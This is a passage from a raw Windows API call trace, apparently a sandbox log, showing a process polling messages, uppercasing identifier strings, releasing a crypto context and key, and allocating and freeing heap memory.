wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.824] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.824] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.824] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.826] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.827] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.827] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.827] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0189.827] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.827] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0189.827] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.827] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.827] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.827] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0189.827] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.827] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0189.828] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0189.828] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.828] CryptDestroyKey (hKey=0xaa5860) returned 1 [0189.828] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.828] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.828] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0189.828] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.828] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0189.828] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.828] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.828] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0189.828] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0189.828] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0189.828] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0189.828] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0189.828] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0189.829] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.829] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.829] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0189.829] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.829] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0189.829] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0189.829] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.829] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.853] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.853] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.853] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.853] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0189.853] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.853] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0189.853] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.853] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.853] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0189.853] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.853] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0189.853] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.853] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.854] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.854] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.854] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.854] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.854] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.854] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.854] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.854] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.854] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.854] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.854] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.854] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.854] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.854] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0189.854] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.854] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0189.854] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.855] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.855] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.855] CryptReleaseContext (hProv=0xaa3868, dwFlags=0x0) returned 1 [0189.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0189.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0189.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0189.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0189.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0189.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0189.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0189.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0189.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0189.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0189.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0189.857] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0189.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0189.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0189.857] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0189.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0189.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0189.858] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0189.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0189.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0189.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0189.858] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0189.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0189.858] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0189.859] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0189.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0189.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0189.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.859] FreeLibrary (hLibModule=0x74d40000) returned 1 [0189.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.860] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.860] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0189.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.860] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0189.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0189.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0189.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0189.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0189.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0189.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0189.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0189.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0189.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.861] 